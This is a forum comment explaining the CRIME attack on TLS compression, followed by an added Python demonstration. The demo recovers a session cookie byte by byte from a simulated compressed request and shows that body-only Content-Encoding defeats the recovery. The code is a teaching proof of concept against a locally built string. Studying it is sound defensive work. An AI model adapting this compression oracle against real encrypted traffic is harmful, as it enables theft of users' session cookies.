by acdha
4887 days ago
Focusing on the CRIME attack people are trying to prevent, TLS compression works for the entire session and will thus include the HTTP headers, which are out of band from HTTP transfer encoding. That's how CRIME works: if an attacker can use something like JavaScript to make a request in your browser with some text which they control and can observe the packet sizes, they can measure whether the entire message compressed more than expected, indicating that some bytes are shared between the browser-generated headers and their injected contents. Repeat enough times and you can recover cookies byte by byte. See http://www.imperialviolet.org/2012/09/21/crime.html for the full details. The good news is that Content-Encoding avoids the attack; the bad news is that it means we're missing the opportunity to avoid transmitting a significant chunk of repetitive text.
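The measurement the comment describes, as an added example that is not part of the comment or of the linked write-up: a simulated request in which the attacker's text lands in the path, the browser appends the Cookie header, and the whole request goes through one DEFLATE stream, the way TLS compression treated the record stream. The request layout, the cookie name `session_id`, the host `target.example` and the secret value are made up for the demo, and URL encoding of the injected text is not modelled. Fixed Huffman coding is forced so that each correct byte shows up as exactly one byte less on the wire; zlib's default dynamic coding leaks the same way, only with more measurement noise. The second oracle compresses only the attacker-controlled body while the headers go out in the clear, which is the Content-Encoding case from the last sentence, and the byte-by-byte search then finds nothing.

```python
"""CRIME-style compression oracle against a simulated TLS-compressed request.

Added example, not code from the original comment.  Request layout, cookie
name, host and secret are constructed for the demo.
"""
import zlib

# Constructed secret the attacker wants to recover.  Distinct hex digits keep
# the accounting simple: no accidental three-byte repeats inside the value.
SECRET = "7f3a9c1e4b0d"
ALPHABET = "0123456789abcdef"  # attacker knows the cookie's character set


def build_request(injected: str, secret: str) -> bytes:
    """Browser-generated request: the attacker's text ends up in the path,
    the Cookie header is added by the browser and is outside their control."""
    return (
        f"GET /?q={injected} HTTP/1.1\r\n"
        f"Host: target.example\r\n"
        f"Cookie: session_id={secret}\r\n\r\n"
    ).encode()


def deflate_len(data: bytes) -> int:
    """Compressed size as an on-path observer sees it.  Z_FIXED forces fixed
    Huffman codes, so every ASCII literal costs 8 bits and a back-reference
    that grows by one byte saves exactly one wire byte."""
    c = zlib.compressobj(level=6, strategy=zlib.Z_FIXED)
    return len(c.compress(data) + c.flush())


def tls_compression_oracle(injected: str) -> int:
    """TLS compression: headers and attacker text share one DEFLATE window."""
    return deflate_len(build_request(injected, SECRET))


def content_encoding_oracle(injected: str) -> int:
    """Content-Encoding: only the attacker-controlled body is compressed,
    the headers (and the cookie in them) are sent uncompressed, so the guess
    never shares a window with the secret."""
    headers = build_request("", SECRET)  # nothing attacker-controlled in here
    return len(headers) + deflate_len(injected.encode())


def recover(oracle, max_len: int = 32) -> str:
    """Byte-by-byte recovery: append each candidate to the known prefix and
    keep the one that makes the request compress strictly better than all
    the others.  A tie means no candidate extended the match: end of the
    secret, or no shared window at all."""
    known = ""
    for _ in range(max_len):
        sizes = {c: oracle(f"Cookie: session_id={known}{c}") for c in ALPHABET}
        best = min(sizes.values())
        winners = [c for c, n in sizes.items() if n == best]
        if len(winners) != 1:
            break
        known += winners[0]
    return known


if __name__ == "__main__":
    print("TLS compression :", recover(tls_compression_oracle))
    print("Content-Encoding:", repr(recover(content_encoding_oracle)))
```

With TLS-style compression `recover` walks the whole cookie value; with body-only compression every candidate produces the same length at the very first position and the search stops with an empty string.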